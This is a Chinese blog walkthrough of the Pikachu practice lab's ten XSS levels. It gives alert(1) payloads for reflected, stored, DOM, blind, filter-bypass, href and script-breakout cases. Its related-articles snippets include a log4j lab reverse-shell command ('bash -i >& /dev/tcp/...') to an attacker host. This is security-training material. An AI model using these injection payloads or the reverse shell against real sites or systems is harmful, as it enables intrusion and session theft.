pikachu靶场通关攻略(XSS)(1~10关)

2024-08-28 19:52
文章标签 pikachu 靶场 xss 攻略 通关

本文主要是介绍pikachu靶场通关攻略(XSS)(1~10关),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

反射型xss(get)

步骤一,我们先打开网站(第一关)

步骤二,首先来到第一关我们先随便输入一个数字1,下边显示谁是1,我不在乎!

步骤三,输入代码:<script>alert(1)</script>我们发现输入不完整,点击快捷键F12调出引导菜单根据箭头指示我们来进行操作下面有一个最多输入20我们改的大一点改成50

步骤四,在尝试输入<script>alert(1)</script>我们发现可以了

步骤五,点击submit

结果显示1我们爆破成功

反射型xss(post)

步骤一,我们来到第二关

步骤二,我们根据提示输入登录账号密码admin;123456

步骤三,登录进去我们随便输入一个数字

步骤四,点击submit

发现和第一关一样我们还是输入<script>alert(1)</script>

结果显示1我们爆破成功

存储型xss

步骤一,我们来到第三关

步骤二,我们试着输入一个数字1发现只是有留言列表里面有

步骤三,点击submit

输入<script>alert(1)</script>

结果显示1我们爆破成功

DOM型xss

第四关和前几关不太一样了,底下可以点击

步骤一,我们试着输入一个数字1

步骤二,点击之后出现Not Found

步骤三,我们输入'οnclick="alert(1)"'

步骤四,点击submit

结果显示1我们爆破成功

DOM型xss-X

步骤一,打开第五关

第五关和第四关一样我们输入'οnclick="alert(1)"'只不过就是多点一下下边的点击处

xss之盲打

步骤一,打开第六关

步骤二,第一个框里输入代码<script>alert(1)</script>第二个框里就输入什么都可以了点击提交

我们看到提示里面有个链接复制下来进入管理员用户,点击提示我们知道了登录的账号密码admin;123456我们登录进去

步骤三,点击login

结果显示1我们爆破成功

xss之过滤

步骤一,打开第七关

步骤二,我们在框里输入代码<script>alert(1)</script>

步骤三,显示下面那个说明没有爆破成功我们看提示说试试绕过改一下小写换大写

步骤三四,点击submit

结果显示1我们爆破成功

xss之htmlspecialchars

步骤一,打开第八关

步骤二,输入代码Javascript:alert(1)

步骤三点击一下下面的点击点

结果显示1我们爆破成功

xss之href输出

步骤一,打开第九关

步骤二,输入代码Javascript:alert(1)

步骤三点击一下下面的点击点

结果显示1我们爆破成功

xss之js输出

步骤一,打开第十关

步骤二,输入代码<script>alert(1)</script>

我们发现不管用,右键打开源代码找到红花箭头这个看见这个输入框输入<script>alert(1)</script>,没有显示,打开源代码查看,发现输入被包括在<script></script>标签中,需要在输入前面输</script>闭合前面的<script>标签

我们输入</script><script>alert(1)</script>

步骤三,点击submit

结果显示1我们爆破成功

这篇关于pikachu靶场通关攻略(XSS)(1~10关)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1115730

相关文章

大模型研发全揭秘:客服工单数据标注的完整攻略

在人工智能(AI)领域,数据标注是模型训练过程中至关重要的一步。无论你是新手还是有经验的从业者,掌握数据标注的技术细节和常见问题的解决方案都能为你的AI项目增添不少价值。在电信运营商的客服系统中,工单数据是客户问题和解决方案的重要记录。通过对这些工单数据进行有效标注,不仅能够帮助提升客服自动化系统的智能化水平,还能优化客户服务流程,提高客户满意度。本文将详细介绍如何在电信运营商客服工单的背景下进行

电脑桌面文件删除了怎么找回来?别急,快速恢复攻略在此

在日常使用电脑的过程中,我们经常会遇到这样的情况:一不小心,桌面上的某个重要文件被删除了。这时,大多数人可能会感到惊慌失措,不知所措。 其实,不必过于担心,因为有很多方法可以帮助我们找回被删除的桌面文件。下面,就让我们一起来了解一下这些恢复桌面文件的方法吧。 一、使用撤销操作 如果我们刚刚删除了桌面上的文件,并且还没有进行其他操作,那么可以尝试使用撤销操作来恢复文件。在键盘上同时按下“C

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

企业大模型落地的“最后一公里”攻略

一、大模型落地的行业现状与前景 大模型在多个行业展现出强大的应用潜力。在金融行业,沉淀了大量高质量数据,各金融平台用户数以亿计,交易数据浩如烟海。利用大模型分析处理这些数据,金融机构可以预测用户行为偏好,更高效、准确评估客户风险,实时监测交易和市场波动,及时制定策略。IDC 调研显示,超半数的金融机构计划在 2023 年投资生成式人工智能技术。 在科技领域,商汤人工智能大装置为大模型企业提

xss-labs-master通关教程

一.level1 先来进行一下代码审计 <?php ini_set("display_errors", 0);//关闭错误显示$str = $_GET["name"]; //接受URL来的get形式的name传参echo "<h2 align=center>欢迎用户".$str."</h2>";//在网页输出,并不是echo执行的,而是echo把HTML代码发送到浏览器,浏览器对发送的H

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

Web安全之XSS跨站脚本攻击:如何预防及解决

1. 什么是XSS注入 XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的Web安全漏洞,通过注入恶意代码(通常是JavaScript)到目标网站的网页中,以此在用户浏览网页时执行。攻击者可以通过XSS获取用户的敏感信息(如Cookie、会话令牌)或控制用户浏览器的行为,进而造成信息泄露、身份冒用等严重后果。 2. XSS攻击类型 2.1 存储型XSS 存储型XS

【前端安全】浅谈XSS攻击和防范

定义 XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 分类 大分类小分类原理非存储DOM型① 不需要经过服务器

2025计算机毕业设计选题攻略

博主介绍:✌全网粉丝10W+,前互联网大厂软件研发、集结硕博英豪成立工作室。专注于计算机相关专业毕业设计项目实战6年之久,选择我们就是选择放心、选择安心毕业✌ 🍅由于篇幅限制,想要获取完整文章或者源码,或者代做,拉到文章底部即可看到个人VX。🍅 2023年 - 2024年 最新计算机毕业设计 本科 选题大全 汇总 计算机专业毕业设计之避坑指南(开题答辩选导师必看) 感兴趣的可以先收藏起来,还

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类